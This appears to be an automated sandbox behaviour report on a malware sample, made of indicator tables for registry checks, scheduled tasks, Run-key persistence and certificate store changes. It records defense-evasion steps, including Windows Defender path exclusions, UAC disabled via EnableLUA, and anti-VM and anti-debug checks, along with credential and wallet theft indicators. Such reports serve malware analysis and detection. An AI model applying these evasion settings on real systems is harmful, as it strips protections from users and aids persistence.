| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\7d41195f4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\7d41195f4d.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\7617c78a76.exe = "C:\\Users\\Admin\\1000013002\\7617c78a76.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameServerClient\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameServerClient.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameServerClientC.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameServerClient.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameServerClientC.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explorta.job | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| File created | C:\Windows\Tasks\chrosha.job | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
